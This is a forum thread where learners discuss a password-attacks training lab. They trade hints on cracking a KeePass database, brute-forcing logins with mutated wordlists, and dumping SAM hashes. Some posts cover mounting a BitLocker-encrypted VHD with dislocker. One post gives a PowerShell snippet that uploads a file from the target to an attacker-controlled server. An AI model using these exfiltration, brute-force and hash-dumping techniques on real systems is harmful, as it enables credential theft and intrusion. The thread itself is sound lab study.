Password Attacks Lab - Hard

If you’re using evil-winrm you can try the download command.
Otherwise you can make use of some PowerShell like so:

# Upload a local file to a listener you control with WebClient.UploadFile
$wc = New-Object Net.WebClient
# UploadFile(address, fileName): first argument is your server's URL, second is the absolute path of the file to transfer
$response = $wc.UploadFile("http://<your-server>/upload", "C:\absolute\path\to\file")

This is from memory so I might have the syntax wrong, but you've got the idea. More details here: https://learn.microsoft.com/fr-fr/dotnet/api/system.net.webclient.uploadfile?view=netframework-4.8#system-net-webclient-uploadfile(system-uri-system-string)

Also, on some Windows machines curl is installed; you can use it to make a POST request to your server.

I was able to crack the Logins.kdbx file with john. Tried to use the password to log in as user D****, without success. Also have the password mut, without success. How can I use the cracked password of Logins.kdbx, and for what?

Hello.
I have been stuck on this module for a long time.
I am trying to find Johnna’s password in total with mutated passwords and tools, but I can’t find it.

I am using the following command
Spoiler warning.

Can someone give me a hint?
(Update) I got password

stuck in the same place

I used the full path to my mutated password list and it worked.

Crackmapexec with the smb flag

Hello.
I am stuck again.
When I try to decrypt a vhd file, it asks for a password as follows.

$ sudo cryptsetup bitlkOpen /dev/nbd0p2 my_label
Enter passphrase for /dev/nbd0p2:

But I don’t know what this password refers to …
What is the password used for this?
I need some hints.

Stuck on the Administrator password. I used samdump2 to get the hashes but they are all the same in my output. I was able to crack it, but it's unusually blank, if you know what I mean. I try xfreerdp and get a logon failure, as well as with evil-winrm.

Update: Finally got the right hash from the SAM file using secretsdump and was able to get the flag.

You’ll need to crack the hash for it. Look into Bitlocker to John type of command to get the hash.

1 Like

Did it, but unfortunately I cannot mount it following the instructions, even though the pass I cracked is correct. It is a GPT partition.

I cracked Administrator's password, but I cannot log in as Administrator…
How do I do it?

1 Like

How did you mount the Backup.vhd file? I have tried everything I can think of.

1 Like

The Backup.vhd is unable to mount using the guestmount tool although I have the correct passphrase.
Any hint or help would be appreciated.

1 Like

I'm also stuck with the vhd file :frowning:
Don't know how to mount it or use it to finish the module (is it relevant for the final flag?).
Any hint would be appreciated.

Got it!
My bad: I didn't let the vhd file finish downloading completely (so it was corrupted :frowning: ).
Thought it was intentional. Blame on me!

@xenotim What method did you use to download the vhd file?

I swapped to a PowerShell terminal as david, but I'm unsure how to log in as david or move that file to my Kali VM. Any tips?

It sucks I'm wasting so much time trying to just download a file from this xfreerdp session to my local Kali. Pretty annoying. Guarantee I finish this box in a fraction of the time it's taking me to just figure out how to download this file to my Kali VM.

EDIT: smbclient ftw

Now stuck with the others on what to do with the NTLM hash that was cracked. None of the PtH techniques are working.

The easier option is to mount it on a Windows machine with BitLocker support. I used a Windows Server virtual machine and it worked like a charm. Note: You will need the pass… :wink:

1 Like

I'm stuck with the initial brute-force using hydra, CME, and crowbar with the johanna user and mutated password list. I've tried multiple versions, mutating the password.list file, and nothing. Just need a hint for syntax or similar. Anyone else on the "struggle bus?"

Try again with CME and the mutated password list.

1 Like

For those struggling to mount the drive, if the guide shared by @god_f3lla does not yield results for you (reporting "Failed to set NBD socket"), this is what worked for me:

sudo mkdir /media/backup_bitlocker /media/mount
sudo losetup -P /dev/loop100 <your_file.vhd>
sudo dislocker -v -V /dev/loop100p2 -u -- /media/backup_bitlocker
sudo mount -o loop,rw /media/backup_bitlocker/dislocker-file /media/mount
ls -la /media/mount

Hope this saves you from wasting at least a couple of hours :slightly_smiling_face:

9 Likes
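Two things in this thread bite people in turn: a Backup.vhd that did not finish downloading (so the right passphrase still fails, as in @xenotim's post), and the losetup/dislocker mount sequence above. The script below is an added example, not from the thread or from any of the tools it calls. It checks that the image still carries a complete VHD footer before wasting time on dislocker, then wraps the mount steps exactly as posted. It assumes dislocker and losetup are installed, keeps the /media/backup_bitlocker and /media/mount paths from the post, and uses a placeholder path for the image.

```shell
#!/bin/sh
# Added example: sanity-check a downloaded .vhd, then mount its BitLocker
# volume with the losetup/dislocker steps from the thread. Not from the thread.

# Every VHD image ends with a 512-byte footer whose first 8 bytes are the
# ASCII cookie "conectix". A transfer that stopped early drops that footer,
# which is why guestmount/dislocker then fail even with a correct passphrase.
vhd_footer_ok() {
    f="$1"
    [ -f "$f" ] || return 1
    size=$(wc -c < "$f" | tr -d ' ')
    [ "$size" -ge 512 ] || return 1
    cookie=$(tail -c 512 "$f" | head -c 8)
    [ "$cookie" = "conectix" ]
}

# Compare the local size with the size the source reported (e.g. from
# smbclient's listing or the RDP share). Constructed helper.
size_matches() {
    f="$1"
    expected="$2"
    [ "$(wc -c < "$f" | tr -d ' ')" -eq "$expected" ]
}

# The mount sequence from the post, gated on the footer check.
# Usage: mount_bitlocker_vhd /path/to/Backup.vhd [/dev/loopN]
mount_bitlocker_vhd() {
    vhd="$1"
    loopdev="${2:-/dev/loop100}"   # -P creates ${loopdev}p1, ${loopdev}p2, ...
    if ! vhd_footer_ok "$vhd"; then
        echo "$vhd: no VHD footer found; the download is probably incomplete" >&2
        return 1
    fi
    sudo mkdir -p /media/backup_bitlocker /media/mount
    sudo losetup -P "$loopdev" "$vhd"
    # -u prompts for the user passphrase you recovered from the hash
    sudo dislocker -v -V "${loopdev}p2" -u -- /media/backup_bitlocker
    sudo mount -o loop,rw /media/backup_bitlocker/dislocker-file /media/mount
    ls -la /media/mount
}
```

Run `vhd_footer_ok Backup.vhd` first; if it fails, re-download rather than retrying passphrases. `mount_bitlocker_vhd Backup.vhd` then performs the posted steps and needs root for losetup, dislocker and mount.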

I am tired brute-forcing this guy account, please someone give me the first letter of his password or the length of the password so I can minimize this huge file.